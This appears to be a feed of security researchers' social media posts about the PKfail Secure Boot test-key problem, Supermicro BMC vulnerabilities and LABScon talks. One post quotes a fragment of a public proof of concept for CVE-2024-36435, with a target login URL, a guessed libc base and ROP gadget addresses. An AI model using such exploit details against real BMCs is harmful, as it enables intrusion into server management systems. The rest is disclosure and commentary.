The ‘PKfail’ Secure Boot disaster just went from bad to worse pcworld.com/article/246020… by Michael Crider

New from BINARLY🔬: "Based on our data, we found PKfail and non-production keys on medical devices, desktops, laptops, gaming consoles, enterprise servers, ATMs, POS terminals, and some weird places like voting machines." binarly.io/blog/pkfail-tw…

More updates will be coming tomorrow at the #LABScon stage. The problems related to the test and non-production keys are much bigger than we initially thought.

🔎 Must-See Talks at #LABScon 2024: Cutting-edge security research in real time: • 🇨🇳 Eugenio Benincasa & Dakota Cary: A Walking Red Flag (With Yellow Stars) • 🇷🇺 Dan Black & Luke Jenkins : Breaching the Battlefield: UNC4221’s Espionage for Military Advantage • 👨‍🌾

Lastest blog post ends "To put a spiky point on it, if using a component labeled “Do not trust,” doesn’t qualify you for liability, what does?" shostack.org/blog/secure-bo…

🚨In just a few hours at #LABScon, we’ll be unveiling a high-impact vulnerability and a critical security discovery affecting platform trust on Supermicro servers. Stay tuned and watch our REsearch blog!

NEW! Repeatable Failures: Test Keys Used to Sign Production Software…Again? 🔥Full details: binarly.io/blog/repeatabl…

Binarly researchers Alex Matrosov and Fabio Pagani with some fresh details on the PKfail supply chain exposure BINARLY🔬 Alex Matrosov Fabio Pagani

Have you seen the 'sp-analysis failed' error and wondered why it appears and how to fix it? In this video, we explain the stack pointer tracing/analysis feature of IDA/its processor modules and how to fix stack pointer tracing errors. youtu.be/Cd6Q-_1dxNU Some of the topics

Non-production cryptographic keys are used widely in the industry, and some vendors have the mindset that if it’s not leaked, it’s not a problem. It’s never happened, right? Check out our new REsearch on Supermicro BMC, which shows a new vulnerability in Root of Trust validation

⛓️ BINARLY🔬's Alex Matrosov and Fabio Pagani unveiled PKFAIL, a critical firmware supply-chain issue affecting hundreds of devices due to vendors shipping default test keys. #LABScon24 📄 Read more about their research in a blog post published the same day: binarly.io/blog/repeatabl…

💔 This week's show is the full keynote day remarks from Juan Andres Guerrero-Saade at #LABScon24. In this talk, Juanito addresses the current state of threat intel, expressing a need for a difficult conversation about its direction and purpose. He discusses feelings of

Don’t miss your chance to be a part of such an amazing event focused on program analysis 🔬

🚨New! "CVE-2024-36435 Deep-Dive: The Year’s Most Critical BMC Security Flaw." 🔥Classic buffer overflow vulnerabilities resurface in BMCs, remotely opening the gates from the castle. 🏆Kudos to Alex Tereshkin for the initial discovery and disclosure! binarly.io/blog/cve-2024-…

Nice writeup! Thanks guys.

💥PoC is now public! target = "https://{ip_address}/cgi/login.cgi" command = "touch /tmp/BRLY" libc = 0x76283000 # we try to guess gadget1 = 0x000D8874 # pop {r0, r1, r2, r3, fp, pc}; gadget2 = 0x001026D4 # mov r0, sp; blx r3; system = 0x0003C4D4 github.com/binarly-io/Too…

Good example of why your OOB management network that these BMC and IPMI interfaces are attached to is extremely security sensitive

Episode 14 is live! ✊ J. A. Guerrero-Saade Costin Raiu open.spotify.com/episode/4GiYat…

Excited to share the first post in my new blog series with LeviathanSecurity: UEFI is the new BIOS This blog series dives deep into UEFI RE/xdev. This first post is your UEFI intro. Check it out, hmu with feedback/q’s ✨ leviathansecurity.com/blog/uefi-is-t…

🔐Update on #PKfail! Our pk.fail detection service has scanned over 10,336 unique firmware images and detected 869 impacted instances — that’s 8.4%! All detected unique keys are now showcased on the service👇